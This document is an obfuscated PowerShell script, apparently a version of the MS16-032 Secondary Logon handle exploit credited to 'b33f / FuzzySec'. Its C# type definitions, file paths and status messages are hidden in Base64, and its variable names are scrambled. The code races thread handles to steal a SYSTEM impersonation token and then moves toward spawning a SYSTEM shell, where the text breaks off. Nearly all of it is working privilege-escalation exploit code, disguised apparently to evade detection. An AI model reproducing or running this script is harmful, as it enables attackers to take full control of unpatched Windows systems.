function __/\/==\/\/\_/\_/= {
	Add-Type -TypeDefinition $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('CQB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AAoACQB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwA7AAoACQB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AAoACQB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsADsACgAJAAoACQBbAFMAdAByAHUAYwB0AEwAYQB5AG8AdQB0ACgATABhAHkAbwB1AHQASwBpAG4AZAAuAFMAZQBxAHUAZQBuAHQAaQBhAGwAKQBdAAoACQBwAHUAYgBsAGkAYwAgAHMAdAByAHUAYwB0ACAAUABSAE8AQwBFAFMAUwBfAEkATgBGAE8AUgBNAEEAVABJAE8ATgAKAAkAewAKAAkACQBwAHUAYgBsAGkAYwAgAEkAbgB0AFAAdAByACAAaABQAHIAbwBjAGUAcwBzADsACgAJAAkAcAB1AGIAbABpAGMAIABJAG4AdABQAHQAcgAgAGgAVABoAHIAZQBhAGQAOwAKAAkACQBwAHUAYgBsAGkAYwAgAGkAbgB0ACAAZAB3AFAAcgBvAGMAZQBzAHMASQBkADsACgAJAAkAcAB1AGIAbABpAGMAIABpAG4AdAAgAGQAdwBUAGgAcgBlAGEAZABJAGQAOwAKAAkAfQAKAAkACgAJAFsAUwB0AHIAdQBjAHQATABhAHkAbwB1AHQAKABMAGEAeQBvAHUAdABLAGkAbgBkAC4AUwBlAHEAdQBlAG4AdABpAGEAbAAsACAAQwBoAGEAcgBTAGUAdAA9AEMAaABhAHIAUwBlAHQALgBVAG4AaQBjAG8AZABlACkAXQAKAAkAcAB1AGIAbABpAGMAIABzAHQAcgB1AGMAdAAgAFMAVABBAFIAVABVAFAASQBOAEYATwAKAAkAewAKAAkACQBwAHUAYgBsAGkAYwAgAEkAbgB0ADMAMgAgAGMAYgA7AAoACQAJAHAAdQBiAGwAaQBjACAAcwB0AHIAaQBuAGcAIABsAHAAUgBlAHMAZQByAHYAZQBkADsACgAJAAkAcAB1AGIAbABpAGMAIABzAHQAcgBpAG4AZwAgAGwAcABEAGUAcwBrAHQAbwBwADsACgAJAAkAcAB1AGIAbABpAGMAIABzAHQAcgBpAG4AZwAgAGwAcABUAGkAdABsAGUAOwAKAAkACQBwAHUAYgBsAGkAYwAgAEkAbgB0ADMAMgAgAGQAdwBYADsACgAJAAkAcAB1AGIAbABpAGMAIABJAG4AdAAzADIAIABkAHcAWQA7AAoACQAJAHAAdQBiAGwAaQBjACAASQBuAHQAMwAyACAAZAB3AFgAUwBpAHoAZQA7AAoACQAJAHAAdQBiAGwAaQBjACAASQBuAHQAMwAyACAAZAB3AFkAUwBpAHoAZQA7AAoACQAJAHAAdQBiAGwAaQBjACAASQBuAHQAMwAyACAAZAB3AFgAQwBvAHUAbgB0AEMAaABhAHIAcwA7AAoACQAJAHAAdQBiAGwAaQBjACAASQBuAHQAMwAyACAAZAB3AFkAQwBvAHUAbgB0AEMAaABhAHIAcwA7AAoACQAJAHAAdQBiAGwAaQBjACAASQBuAHQAMwAyACAAZAB3AEYAaQBsAGwAQQB0AHQAcgBpAGIAdQB0AGUAOwAKAAkACQBwAHUAYgBsAGkAYwAgAEkAbgB0ADMAMgAgAGQAdwBGAGwAYQBnAHMAOwAKAAkACQBwAHUAYgBsAGkAYwAgAEkAbgB0ADEANgAgAHcAUwBoAG8AdwBXAGkAbgBkAG8AdwA7AAoACQAJAHAAdQBiAGwAaQBjACAASQBuAHQAMQA2ACAAYwBiAFIAZQBzAGUAcgB2AGUAZAAyADsACgAJAAkAcAB1AGIAbABpAGMAIABJAG4AdABQAHQAcgAgAGwAcABSAGUAcwBlAHIAdgBlAGQAMgA7AAoACQAJAHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABoAFMAdABkAEkAbgBwAHUAdAA7AAoACQAJAHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABoAFMAdABkAE8AdQB0AHAAdQB0ADsACgAJAAkAcAB1AGIAbABpAGMAIABJAG4AdABQAHQAcgAgAGgAUwB0AGQARQByAHIAbwByADsACgAJAH0ACgAJAAoACQBbAFMAdAByAHUAYwB0AEwAYQB5AG8AdQB0ACgATABhAHkAbwB1AHQASwBpAG4AZAAuAFMAZQBxAHUAZQBuAHQAaQBhAGwAKQBdAAoACQBwAHUAYgBsAGkAYwAgAHMAdAByAHUAYwB0ACAAUwBRAE8AUwAKAAkAewAKAAkACQBwAHUAYgBsAGkAYwAgAGkAbgB0ACAATABlAG4AZwB0AGgAOwAKAAkACQBwAHUAYgBsAGkAYwAgAGkAbgB0ACAASQBtAHAAZQByAHMAbwBuAGEAdABpAG8AbgBMAGUAdgBlAGwAOwAKAAkACQBwAHUAYgBsAGkAYwAgAGkAbgB0ACAAQwBvAG4AdABlAHgAdABUAHIAYQBjAGsAaQBuAGcATQBvAGQAZQA7AAoACQAJAHAAdQBiAGwAaQBjACAAYgBvAG8AbAAgAEUAZgBmAGUAYwB0AGkAdgBlAE8AbgBsAHkAOwAKAAkAfQAKAAkACgAJAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABBAGQAdgBhAHAAaQAzADIACgAJAHsACgAJAAkAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAYQBkAHYAYQBwAGkAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAFUAbgBpAGMAbwBkAGUAKQBdAAoACQAJAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzAFcAaQB0AGgATABvAGcAbwBuAFcAKAAKAAkACQAJAFMAdAByAGkAbgBnACAAdQBzAGUAcgBOAGEAbQBlACwACgAJAAkACQBTAHQAcgBpAG4AZwAgAGQAbwBtAGEAaQBuACwACgAJAAkACQBTAHQAcgBpAG4AZwAgAHAAYQBzAHMAdwBvAHIAZAAsAAoACQAJAAkAaQBuAHQAIABsAG8AZwBvAG4ARgBsAGEAZwBzACwACgAJAAkACQBTAHQAcgBpAG4AZwAgAGEAcABwAGwAaQBjAGEAdABpAG8AbgBOAGEAbQBlACwACgAJAAkACQBTAHQAcgBpAG4AZwAgAGMAbwBtAG0AYQBuAGQATABpAG4AZQAsAAoACQAJAAkAaQBuAHQAIABjAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwACgAJAAkACQBpAG4AdAAgAGUAbgB2AGkAcgBvAG4AbQBlAG4AdAAsAAoACQAJAAkAUwB0AHIAaQBuAGcAIABjAHUAcgByAGUAbgB0AEQAaQByAGUAYwB0AG8AcgB5ACwACgAJAAkACQByAGUAZgAgACAAUwBUAEEAUgBUAFUAUABJAE4ARgBPACAAcwB0AGEAcgB0AHUAcABJAG4AZgBvACwACgAJAAkACQBvAHUAdAAgAFAAUgBPAEMARQBTAFMAXwBJAE4ARgBPAFIATQBBAFQASQBPAE4AIABwAHIAbwBjAGUAcwBzAEkAbgBmAG8AcgBtAGEAdABpAG8AbgApADsACgAJAAkACQAKAAkACQBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBhAGQAdgBhAHAAaQAzADIALgBkAGwAbAAiACwAIABTAGUAdABMAGEAcwB0AEUAcgByAG8AcgA9AHQAcgB1AGUAKQBdAAoACQAJAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGUAdABUAGgAcgBlAGEAZABUAG8AawBlAG4AKAAKAAkACQAJAHIAZQBmACAASQBuAHQAUAB0AHIAIABUAGgAcgBlAGEAZAAsAAoACQAJAAkASQBuAHQAUAB0AHIAIABUAG8AawBlAG4AKQA7AAoACQAJAAkACgAJAAkAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAYQBkAHYAYQBwAGkAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQAKAAkACQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABiAG8AbwBsACAATwBwAGUAbgBUAGgAcgBlAGEAZABUAG8AawBlAG4AKAAKAAkACQAJAEkAbgB0AFAAdAByACAAVABoAHIAZQBhAGQASABhAG4AZABsAGUALAAKAAkACQAJAGkAbgB0ACAARABlAHMAaQByAGUAZABBAGMAYwBlAHMAcwAsAAoACQAJAAkAYgBvAG8AbAAgAE8AcABlAG4AQQBzAFMAZQBsAGYALAAKAAkACQAJAG8AdQB0ACAASQBuAHQAUAB0AHIAIABUAG8AawBlAG4ASABhAG4AZABsAGUAKQA7AAoACQAJAAkACgAJAAkAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAYQBkAHYAYQBwAGkAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQAKAAkACQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABiAG8AbwBsACAATwBwAGUAbgBQAHIAbwBjAGUAcwBzAFQAbwBrAGUAbgAoAAoACQAJAAkASQBuAHQAUAB0AHIAIABQAHIAbwBjAGUAcwBzAEgAYQBuAGQAbABlACwAIAAKAAkACQAJAGkAbgB0ACAARABlAHMAaQByAGUAZABBAGMAYwBlAHMAcwAsAAoACQAJAAkAcgBlAGYAIABJAG4AdABQAHQAcgAgAFQAbwBrAGUAbgBIAGEAbgBkAGwAZQApADsACgAJAAkACQAKAAkACQBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBhAGQAdgBhAHAAaQAzADIALgBkAGwAbAAiACwAIABTAGUAdABMAGEAcwB0AEUAcgByAG8AcgA9AHQAcgB1AGUAKQBdAAoACQAJAHAAdQBiAGwAaQBjACAAZQB4AHQAZQByAG4AIABzAHQAYQB0AGkAYwAgAGIAbwBvAGwAIABEAHUAcABsAGkAYwBhAHQAZQBUAG8AawBlAG4AKAAKAAkACQAJAEkAbgB0AFAAdAByACAARQB4AGkAcwB0AGkAbgBnAFQAbwBrAGUAbgBIAGEAbgBkAGwAZQAsAAoACQAJAAkAaQBuAHQAIABTAEUAQwBVAFIASQBUAFkAXwBJAE0AUABFAFIAUwBPAE4AQQBUAEkATwBOAF8ATABFAFYARQBMACwACgAJAAkACQByAGUAZgAgAEkAbgB0AFAAdAByACAARAB1AHAAbABpAGMAYQB0AGUAVABvAGsAZQBuAEgAYQBuAGQAbABlACkAOwAKAAkAfQAKAAkACgAJAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABLAGUAcgBuAGUAbAAzADIACgAJAHsACgAJAAkAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0ACgAJAAkAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAEcAZQB0AEwAYQBzAHQARQByAHIAbwByACgAKQA7AAoACQAKAAkACQBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACwAIABTAGUAdABMAGEAcwB0AEUAcgByAG8AcgA9AHQAcgB1AGUAKQBdAAoACQAJAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQA7AAoACQAKAAkACQBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACwAIABTAGUAdABMAGEAcwB0AEUAcgByAG8AcgA9AHQAcgB1AGUAKQBdAAoACQAJAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAARwBlAHQAQwB1AHIAcgBlAG4AdABUAGgAcgBlAGEAZAAoACkAOwAKAAkACQAKAAkACQBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACwAIABTAGUAdABMAGEAcwB0AEUAcgByAG8AcgA9AHQAcgB1AGUAKQBdAAoACQAJAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAARwBlAHQAVABoAHIAZQBhAGQASQBkACgASQBuAHQAUAB0AHIAIABoAFQAaAByAGUAYQBkACkAOwAKAAkACQAKAAkACQBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACwAIABTAGUAdABMAGEAcwB0AEUAcgByAG8AcgAgAD0AIAB0AHIAdQBlACkAXQAKAAkACQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAEcAZQB0AFAAcgBvAGMAZQBzAHMASQBkAE8AZgBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAaABhAG4AZABsAGUAKQA7AAoACQAJAAoACQAJAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIALABTAGUAdABMAGEAcwB0AEUAcgByAG8AcgA9AHQAcgB1AGUAKQBdAAoACQAJAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAUwB1AHMAcABlAG4AZABUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAaABUAGgAcgBlAGEAZAApADsACgAJAAkACgAJAAkAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsAFMAZQB0AEwAYQBzAHQARQByAHIAbwByAD0AdAByAHUAZQApAF0ACgAJAAkAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAcwB1AG0AZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAaABUAGgAcgBlAGEAZAApADsACgAJAAkACgAJAAkAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQAKAAkACQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABiAG8AbwBsACAAVABlAHIAbQBpAG4AYQB0AGUAUAByAG8AYwBlAHMAcwAoAAoACQAJAAkASQBuAHQAUAB0AHIAIABoAFAAcgBvAGMAZQBzAHMALAAKAAkACQAJAHUAaQBuAHQAIAB1AEUAeABpAHQAQwBvAGQAZQApADsACgAJAAoACQAJAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIALAAgAFMAZQB0AEwAYQBzAHQARQByAHIAbwByAD0AdAByAHUAZQApAF0ACgAJAAkAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAYgBvAG8AbAAgAEMAbABvAHMAZQBIAGEAbgBkAGwAZQAoAEkAbgB0AFAAdAByACAAaABPAGIAagBlAGMAdAApADsACgAJAAkACgAJAAkAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQAKAAkACQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABiAG8AbwBsACAARAB1AHAAbABpAGMAYQB0AGUASABhAG4AZABsAGUAKAAKAAkACQAJAEkAbgB0AFAAdAByACAAaABTAG8AdQByAGMAZQBQAHIAbwBjAGUAcwBzAEgAYQBuAGQAbABlACwACgAJAAkACQBJAG4AdABQAHQAcgAgAGgAUwBvAHUAcgBjAGUASABhAG4AZABsAGUALAAKAAkACQAJAEkAbgB0AFAAdAByACAAaABUAGEAcgBnAGUAdABQAHIAbwBjAGUAcwBzAEgAYQBuAGQAbABlACwACgAJAAkACQByAGUAZgAgAEkAbgB0AFAAdAByACAAbABwAFQAYQByAGcAZQB0AEgAYQBuAGQAbABlACwACgAJAAkACQBpAG4AdAAgAGQAdwBEAGUAcwBpAHIAZQBkAEEAYwBjAGUAcwBzACwACgAJAAkACQBiAG8AbwBsACAAYgBJAG4AaABlAHIAaQB0AEgAYQBuAGQAbABlACwACgAJAAkACQBpAG4AdAAgAGQAdwBPAHAAdABpAG8AbgBzACkAOwAKAAkAfQAKAAkACgAJAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABOAHQAZABsAGwACgAJAHsACgAJAAkAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQAKAAkACQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABJAG0AcABlAHIAcwBvAG4AYQB0AGUAVABoAHIAZQBhAGQAKAAKAAkACQAJAEkAbgB0AFAAdAByACAAVABoAHIAZQBhAGQASABhAG4AZABsAGUALAAKAAkACQAJAEkAbgB0AFAAdAByACAAVABoAHIAZQBhAGQAVABvAEkAbQBwAGUAcgBzAG8AbgBhAHQAZQAsAAoACQAJAAkAcgBlAGYAIABTAFEATwBTACAAUwBlAGMAdQByAGkAdAB5AFEAdQBhAGwAaQB0AHkATwBmAFMAZQByAHYAaQBjAGUAKQA7AAoACQB9AA==')))
	function __/=\/=\/=\/====\/ {
		${_____/=\_/\/=\_/=} = New-Object STARTUPINFO
		${_____/=\_/\/=\_/=}.dwFlags = 0x00000100 
		${_____/=\_/\/=\_/=}.hStdInput = [Kernel32]::GetCurrentThread()
		${_____/=\_/\/=\_/=}.hStdOutput = [Kernel32]::GetCurrentThread()
		${_____/=\_/\/=\_/=}.hStdError = [Kernel32]::GetCurrentThread()
		${_____/=\_/\/=\_/=}.cb = [System.Runtime.InteropServices.Marshal]::SizeOf(${_____/=\_/\/=\_/=}) 
		${_/=\_/\_/\__/====} = New-Object PROCESS_INFORMATION
		${____/===\_/====\_} = (gi -Path ".\" -Verbose).FullName
		${___/======\/\/\__} = [Advapi32]::CreateProcessWithLogonW(
			$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dQBzAGUAcgA='))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZABvAG0AYQBpAG4A'))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cABhAHMAcwA='))),
			0x00000002, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAGMAbQBkAC4AZQB4AGUA'))), "",
			0x00000004, $null, ${____/===\_/====\_},
			[ref]${_____/=\_/\/=\_/=}, [ref]${_/=\_/\_/\__/====})
		${_/=\__/=\/=\___/=} = [IntPtr]::Zero
		${___/======\/\/\__} = [Kernel32]::DuplicateHandle(
			${_/=\_/\_/\__/====}.hProcess, 0x4,
			[Kernel32]::GetCurrentProcess(),
			[ref]${_/=\__/=\/=\___/=}, 0, $false,
			0x00000002)
		${___/======\/\/\__} = [Kernel32]::TerminateProcess(${_/=\_/\_/\__/====}.hProcess, 1)
		${___/======\/\/\__} = [Kernel32]::CloseHandle(${_/=\_/\_/\__/====}.hProcess)
		${___/======\/\/\__} = [Kernel32]::CloseHandle(${_/=\_/\_/\__/====}.hThread)
		${_/=\__/=\/=\___/=}
	}
	function __/===\_/====\/\/= {
		echo $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('CgBbAD8AXQAgAFQAaAByAGUAYQBkACAAYgBlAGwAbwBuAGcAcwAgAHQAbwA6ACAAJAAoACQAKABwAHMAIAAtAFAASQBEACAAJAAoAFsASwBlAHIAbgBlAGwAMwAyAF0AOgA6AEcAZQB0AFAAcgBvAGMAZQBzAHMASQBkAE8AZgBUAGgAcgBlAGEAZAAoACQAewAvAD0AXAAvAD0APQBcAC8APQBcAC8APQA9AFwALwBcAF8AfQApACkAKQAuAFAAcgBvAGMAZQBzAHMATgBhAG0AZQApAA==')))
		${___/======\/\/\__} = [Kernel32]::SuspendThread(${/=\/==\/=\/==\/\_})
		if (${___/======\/\/\__} -ne 0) {
			echo $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwAhAF0AIAAkAHsALwA9AFwALwA9AD0AXAAvAD0AXAAvAD0APQBcAC8AXABfAH0AIABpAHMAIABhACAAYgBhAGQAIAB0AGgAcgBlAGEAZAAsACAAZQB4AGkAdABpAG4AZwAuAC4A')))
			Return
		} echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwArAF0AIABUAGgAcgBlAGEAZAAgAHMAdQBzAHAAZQBuAGQAZQBkAA==')))
		echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwA+AF0AIABXAGkAcABpAG4AZwAgAGMAdQByAHIAZQBuAHQAIABpAG0AcABlAHIAcwBvAG4AYQB0AGkAbwBuACAAdABvAGsAZQBuAA==')))
		${___/======\/\/\__} = [Advapi32]::SetThreadToken([ref]${/=\/==\/=\/==\/\_}, [IntPtr]::Zero)
		if (!${___/======\/\/\__}) {
			echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwAhAF0AIABTAGUAdABUAGgAcgBlAGEAZABUAG8AawBlAG4AIABmAGEAaQBsAGUAZAAsACAAZQB4AGkAdABpAG4AZwAuAC4A')))
			${___/======\/\/\__} = [Kernel32]::ResumeThread(${/=\/==\/=\/==\/\_})
			echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwArAF0AIABUAGgAcgBlAGEAZAAgAHIAZQBzAHUAbQBlAGQAIQA=')))
			Return
		}
		echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwA+AF0AIABCAHUAaQBsAGQAaQBuAGcAIABTAFkAUwBUAEUATQAgAGkAbQBwAGUAcgBzAG8AbgBhAHQAaQBvAG4AIAB0AG8AawBlAG4A')))
		${_____/=\/\/\_/\_/} = New-Object SQOS
		${_____/=\/\/\_/\_/}.ImpersonationLevel = 2 
		${_____/=\/\/\_/\_/}.Length = [System.Runtime.InteropServices.Marshal]::SizeOf(${_____/=\/\/\_/\_/})
		${___/======\/\/\__} = [Ntdll]::NtImpersonateThread(${/=\/==\/=\/==\/\_}, ${/=\/==\/=\/==\/\_}, [ref]${_____/=\/\/\_/\_/})
		if (${___/======\/\/\__} -ne 0) {
			echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwAhAF0AIABOAHQASQBtAHAAZQByAHMAbwBuAGEAdABlAFQAaAByAGUAYQBkACAAZgBhAGkAbABlAGQALAAgAGUAeABpAHQAaQBuAGcALgAuAA==')))
			${___/======\/\/\__} = [Kernel32]::ResumeThread(${/=\/==\/=\/==\/\_})
			echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwArAF0AIABUAGgAcgBlAGEAZAAgAHIAZQBzAHUAbQBlAGQAIQA=')))
			Return
		}
		${script:/==\_/\/==\__/\/\} = [IntPtr]::Zero
		${___/======\/\/\__} = [Advapi32]::OpenThreadToken(${/=\/==\/=\/==\/\_}, 0x0006, $false, [ref]${/==\_/\/==\__/\/\})
		if (!${___/======\/\/\__}) {
			echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwAhAF0AIABPAHAAZQBuAFQAaAByAGUAYQBkAFQAbwBrAGUAbgAgAGYAYQBpAGwAZQBkACwAIABlAHgAaQB0AGkAbgBnAC4ALgA=')))
			${___/======\/\/\__} = [Kernel32]::ResumeThread(${/=\/==\/=\/==\/\_})
			echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwArAF0AIABUAGgAcgBlAGEAZAAgAHIAZQBzAHUAbQBlAGQAIQA=')))
			Return
		}
		echo $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwA/AF0AIABTAHUAYwBjAGUAcwBzACwAIABvAHAAZQBuACAAUwBZAFMAVABFAE0AIAB0AG8AawBlAG4AIABoAGEAbgBkAGwAZQA6ACAAJAB7AC8APQA9AFwAXwAvAFwALwA9AD0AXABfAF8ALwBcAC8AXAB9AA==')))
		echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwArAF0AIABSAGUAcwB1AG0AaQBuAGcAIAB0AGgAcgBlAGEAZAAuAC4A')))
		${___/======\/\/\__} = [Kernel32]::ResumeThread(${/=\/==\/=\/==\/\_})
	}
	${_/\_/\/=\/\______} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('CQAgAF8AXwAgAF8AXwAgAF8AXwBfACAAXwBfAF8AIAAgACAAXwBfAF8AIAAgACAAIAAgAF8AXwBfACAAXwBfAF8AIABfAF8AXwAgAAoACQB8ACAAIABWACAAIAB8ACAAIABfAHwAXwAgACAAfAAgAHwAIAAgAF8AfABfAF8AXwB8ACAAIAAgAHwAXwAgACAAfABfACAAIAB8AAoACQB8ACAAIAAgACAAIAB8AF8AIAAgAHwAXwB8ACAAfABfAHwAIAAuACAAfABfAF8AXwB8ACAAfAAgAHwAXwAgACAAfAAgACAAXwB8AAoACQB8AF8AfABfAHwAXwB8AF8AXwBfAHwAXwBfAF8AXwBfAHwAXwBfAF8AfAAgACAAIAB8AF8AXwBfAHwAXwBfAF8AfABfAF8AXwB8AAoACQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAKAAkAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAWwBiAHkAIABiADMAMwBmACAALQA+ACAAQABGAHUAegB6AHkAUwBlAGMAXQA=')))
	${_/\_/\/=\/\______}
	echo $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('CgBbAD8AXQAgAE8AcABlAHIAYQB0AGkAbgBnACAAcwB5AHMAdABlAG0AIABjAG8AcgBlACAAYwBvAHUAbgB0ADoAIAAkACgAWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBQAHIAbwBjAGUAcwBzAG8AcgBDAG8AdQBuAHQAKQA=')))
	if ($([System.Environment]::ProcessorCount) -lt 2) {
		echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwAhAF0AIABUAGgAaQBzACAAaQBzACAAYQAgAFYATQAgAGkAcwBuACcAdAAgAGkAdAAsACAAcgBhAGMAZQAgAGMAbwBuAGQAaQB0AGkAbwBuACAAcgBlAHEAdQBpAHIAZQBzACAAYQB0ACAAbABlAGEAcwB0ACAAMgAgAEMAUABVACAAYwBvAHIAZQBzACwAIABlAHgAaQB0AGkAbgBnACEACgA=')))
		Return
	}
	echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwA+AF0AIABEAHUAcABsAGkAYwBhAHQAaQBuAGcAIABDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzAFcAaQB0AGgATABvAGcAbwBuAFcAIABoAGEAbgBkAGwAZQA=')))
	${/=\/==\/=\/==\/\_} = __/=\/=\/=\/====\/
	if (${/=\/==\/=\/==\/\_} -eq 0) {
		echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwAhAF0AIABOAG8AIAB2AGEAbABpAGQAIAB0AGgAcgBlAGEAZAAgAGgAYQBuAGQAbABlACAAdwBhAHMAIABjAGEAcAB0AHUAcgBlAGQALAAgAGUAeABpAHQAaQBuAGcAIQAKAA==')))
		Return
	} else {
		echo $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwA/AF0AIABEAG8AbgBlACwAIAB1AHMAaQBuAGcAIAB0AGgAcgBlAGEAZAAgAGgAYQBuAGQAbABlADoAIAAkAHsALwA9AFwALwA9AD0AXAAvAD0AXAAvAD0APQBcAC8AXABfAH0A')))
	} echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('CgBbACoAXQAgAFMAbgBpAGYAZgBpAG4AZwAgAG8AdQB0ACAAcAByAGkAdgBpAGwAZQBnAGUAZAAgAGkAbQBwAGUAcgBzAG8AbgBhAHQAaQBvAG4AIAB0AG8AawBlAG4ALgAuAA==')))
	__/===\_/====\/\/=
	if (${/==\_/\/==\__/\/\} -eq 0) {
		Return
	}
	echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('CgBbACoAXQAgAFMAbgBpAGYAZgBpAG4AZwAgAG8AdQB0ACAAUwBZAFMAVABFAE0AIABzAGgAZQBsAGwALgAuAA==')))
